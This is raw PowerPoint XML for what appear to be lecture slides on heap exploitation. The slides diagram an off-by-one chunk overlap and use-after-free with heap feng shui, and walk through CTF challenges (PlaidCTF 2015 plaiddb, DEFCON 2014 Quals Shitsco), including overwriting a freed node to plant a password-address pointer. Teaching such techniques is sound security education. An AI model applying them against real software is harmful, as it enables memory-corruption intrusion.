      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3171" name="Shape 3171"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500775" y="2811650"/>
            <a:ext cx="76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2" name="Shape 3172"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300375" y="2859513"/>
            <a:ext cx="2508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size(B) += size(C)</a:t>
            </a:r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Shape 3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byte off-by-one</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3178" name="Shape 3178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="1669375"/>
            <a:ext cx="1025700" cy="31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79" name="Shape 3179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="1669375"/>
            <a:ext cx="1025700" cy="3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80" name="Shape 3180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="2415000"/>
            <a:ext cx="1025700" cy="31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81" name="Shape 3181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="2415000"/>
            <a:ext cx="1025700" cy="3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82" name="Shape 3182"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094725" y="3201450"/>
            <a:ext cx="1025700" cy="31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83" name="Shape 3183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2120425" y="3201450"/>
            <a:ext cx="1025700" cy="31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84" name="Shape 3184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065925" y="4021175"/>
            <a:ext cx="2080200" cy="3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85" name="Shape 3185"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="1484150"/>
            <a:ext cx="356100" cy="356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86" name="Shape 3186"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="1950025"/>
            <a:ext cx="356100" cy="356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87" name="Shape 3187"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6907875" y="2393700"/>
            <a:ext cx="356100" cy="35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88" name="Shape 3188"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="1519700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Vulnerable Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3189" name="Shape 3189"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="1974475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Allocated Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3190" name="Shape 3190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7399425" y="2429250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Free Chunk</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3191" name="Shape 3191"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4197725" y="1634275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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3192" name="Shape 3192"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4265400" y="2332300"/>
            <a:ext cx="1538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prev_inuse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3193" name="Shape 3193"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3862900" y="3156763"/>
            <a:ext cx="2425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freed, A is consolidated</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3194" name="Shape 3194"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3944550" y="3981250"/>
            <a:ext cx="2180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 larger than B,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is overlapped</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3195" name="Shape 3195"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1500775" y="2811650"/>
            <a:ext cx="76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6" name="Shape 3196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1300375" y="2859513"/>
            <a:ext cx="2508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prev_inuse=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3197" name="Shape 3197"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929250" y="3436125"/>
            <a:ext cx="1944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PlaidCTF 2015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plaiddb</a:t>
            </a:r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Shape 3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After Free Exploitation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3203" name="Shape 3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implementation matters!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malloc/free mechanism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carefully arrange memory chunks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heap feng shui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software functions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path or malloc/free order, different exploitation method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with type confusion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object takes place of another object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object's data field overlapped with other object's function pointer</a:t>
            </a:r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7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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3209" name="Shape 3209"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="2845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Welcome to Shitsco Internet Operating System (IOS)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For a command list, enter ?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set a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You must set a value for a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set a a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set b b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set c c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set a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set b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set c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show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: (null)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3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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3215" name="Shape 3215"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6304600" y="1631750"/>
            <a:ext cx="21102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typedef struct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char *name;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char *value;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*prev;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*next;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6" name="Shape 3216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="15386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3217" name="Shape 3217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="19109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3218" name="Shape 3218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="26555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prev=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3219" name="Shape 3219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="22832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3220" name="Shape 3220"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998225" y="1228013"/>
            <a:ext cx="1163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3221" name="Shape 3221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="15386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3222" name="Shape 3222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="19109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3223" name="Shape 3223"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="26555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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3224" name="Shape 3224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="22832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next=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3225" name="Shape 3225"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3219" idx="3"/>
            <a:endCxn id="3221" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2061125" y="1724800"/>
            <a:ext cx="571200" cy="7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6" name="Shape 3226"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3223" idx="1"/>
            <a:endCxn id="3218" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2061150" y="2841700"/>
            <a:ext cx="5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7" name="Shape 3227"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570275" y="1228013"/>
            <a:ext cx="1163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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3233" name="Shape 3233"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6304600" y="1631750"/>
            <a:ext cx="21102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typedef struct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char *name;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char *value;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*prev;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*next;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1099025" y="1538650"/>
            <a:ext cx="962100" cy="37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name=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3235" name="Shape 3235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="1910950"/>
            <a:ext cx="962100" cy="37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value=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3236" name="Shape 3236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="26555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prev=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3237" name="Shape 3237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="2283238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3238" name="Shape 3238"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998225" y="1228013"/>
            <a:ext cx="1163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3239" name="Shape 3239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="15386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3240" name="Shape 3240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="19109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3241" name="Shape 3241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="26555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prev=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3242" name="Shape 3242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="22832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next=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3243" name="Shape 3243"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3237" idx="3"/>
            <a:endCxn id="3239" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2061125" y="1724788"/>
            <a:ext cx="571200" cy="74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4" name="Shape 3244"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3241" idx="1"/>
            <a:endCxn id="3236" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2061150" y="2841700"/>
            <a:ext cx="5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5" name="Shape 3245"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570275" y="1228013"/>
            <a:ext cx="1163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3246" name="Shape 3246"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106800" y="3586750"/>
            <a:ext cx="176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head</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3247" name="Shape 3247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2252275" y="2682700"/>
            <a:ext cx="318000" cy="318000"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd fmla="val 13466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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3253" name="Shape 3253"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6304600" y="1631750"/>
            <a:ext cx="21102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typedef struct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char *name;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char *value;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*prev;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*next;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4" name="Shape 3254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="1538650"/>
            <a:ext cx="962100" cy="37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name=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3255" name="Shape 3255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="1910950"/>
            <a:ext cx="962100" cy="37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value=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3256" name="Shape 3256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="265580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prev=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3257" name="Shape 3257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="2283363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3258" name="Shape 3258"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998225" y="1228013"/>
            <a:ext cx="1163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3259" name="Shape 3259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="1538650"/>
            <a:ext cx="962100" cy="37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name=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3260" name="Shape 3260"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="1910950"/>
            <a:ext cx="962100" cy="37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value=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3261" name="Shape 3261"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="265580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prev=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3262" name="Shape 3262"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632350" y="2283375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next=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3263" name="Shape 3263"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3257" idx="3"/>
            <a:endCxn id="3259" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2061125" y="1724913"/>
            <a:ext cx="571200" cy="74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4" name="Shape 3264"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570275" y="1228013"/>
            <a:ext cx="1163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3265" name="Shape 3265"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106800" y="3586750"/>
            <a:ext cx="176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node</a:t>
            </a:r>
            <a:endParaRP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9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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3271" name="Shape 3271"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6304600" y="1631750"/>
            <a:ext cx="21102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typedef struct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char *name;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char *value;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*prev;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*next;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2" name="Shape 3272"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="1538650"/>
            <a:ext cx="962100" cy="37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name=c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3273" name="Shape 3273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="1910950"/>
            <a:ext cx="962100" cy="37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3274" name="Shape 3274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="2655775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prev=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3275" name="Shape 3275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="22832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3276" name="Shape 3276"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998225" y="1228013"/>
            <a:ext cx="1163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3277" name="Shape 3277"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3275" idx="3"/>
            <a:endCxn id="3278" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2061125" y="1743700"/>
            <a:ext cx="558600" cy="72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9" name="Shape 3279"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570275" y="1228013"/>
            <a:ext cx="1163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3280" name="Shape 3280"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106800" y="3586750"/>
            <a:ext cx="29634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 AAAABBBBCCCCDDDD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3278" name="Shape 3278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="1557638"/>
            <a:ext cx="962100" cy="37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AAAA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3281" name="Shape 3281"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="1929938"/>
            <a:ext cx="962100" cy="37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BBBB</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3282" name="Shape 3282"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="2655763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CCCC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3283" name="Shape 3283"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="2283238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DDDD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3284" name="Shape 3284"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3273" idx="3"/>
            <a:endCxn id="3278" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2061125" y="1743700"/>
            <a:ext cx="55860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&amp; AT&amp;T</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="228" name="Shape 228"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1289775" y="114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{8672EFCA-FB07-4488-97D7-7D83822E2600}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2933650"/>
                <a:gridCol w="2933650"/>
              </a:tblGrid>
              <a:tr h="33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AT&amp;T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eax,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movl $8, %eax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3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ebx, 0ffffh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movl $0xffff, %ebx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3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80h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$80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3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eax, [ecx]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movl (%ecx), %eax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Shape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1539325" y="3288500"/>
            <a:ext cx="2684100" cy="1581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ebp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ebp, esp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mov eax, [ebp+12]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add eax, [ebp+8]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pop ebp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retn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223425" y="3288500"/>
            <a:ext cx="2684100" cy="1581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pushl %ebp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movl %esp,%ebp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movl 12(%ebp),%eax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addl 8(%ebp),%eax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popl %ebp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8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Shape 3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Shitsco (DEFCON 2014 Quals)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3290" name="Shape 3290"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6304600" y="1631750"/>
            <a:ext cx="21102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typedef struct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char *name;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char *value;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*prev;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*next;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1" name="Shape 3291"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="1538650"/>
            <a:ext cx="962100" cy="37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name=c</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3292" name="Shape 3292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="1910950"/>
            <a:ext cx="962100" cy="37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3293" name="Shape 3293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="2655775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prev=0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3294" name="Shape 3294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1099025" y="2283250"/>
            <a:ext cx="962100" cy="3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3295" name="Shape 3295"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998225" y="1228013"/>
            <a:ext cx="1163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3296" name="Shape 3296"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3294" idx="3"/>
            <a:endCxn id="3297" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2061125" y="1743700"/>
            <a:ext cx="558600" cy="72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8" name="Shape 3298"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2570275" y="1228013"/>
            <a:ext cx="1163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3299" name="Shape 3299"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106800" y="3586750"/>
            <a:ext cx="29634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 AAAABBBBCCCCDDDD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3297" name="Shape 3297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="1557638"/>
            <a:ext cx="962100" cy="372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AAAA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3300" name="Shape 3300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="1929938"/>
            <a:ext cx="962100" cy="372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pwd addr</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3301" name="Shape 3301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="2655763"/>
            <a:ext cx="962100" cy="372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CCCC</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3302" name="Shape 3302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2619725" y="2283238"/>
            <a:ext cx="962100" cy="372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pointer</a:t>
            </a:r>
            <a:endParaRPr/>
